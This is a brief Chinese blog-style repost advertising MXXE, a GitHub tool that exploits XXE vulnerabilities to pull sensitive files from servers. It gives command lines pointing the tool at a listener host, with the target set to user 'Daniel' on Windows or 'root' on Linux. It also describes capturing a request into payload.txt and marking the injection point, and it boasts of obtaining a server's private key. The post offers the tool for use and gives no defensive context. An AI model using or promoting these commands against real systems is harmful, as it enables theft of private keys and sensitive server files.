本文主要是介绍MXXE利用XXE漏洞快速获取服务器敏感文件工具,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
https://github.com/MartinxMax/MXXE
关于
MXXEV1.2升级版,快速获取服务器敏感文件
获取Windows服务器敏感文件
把数据包复制到payload.txt进行自动注入
$ python3 MXXE.py -lh 10.10.16.5 -user Daniel -server windows
幸运的是我们找到了服务器的私匙
获取Linux服务器敏感文件
把数据包复制到payload.txt进行自动注入
标记注入点
$ python3 MXXE.py -lh 192.168.8.102 -user root -server linux
一些敏感文件保存在当前目录
这篇关于MXXE利用XXE漏洞快速获取服务器敏感文件工具的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!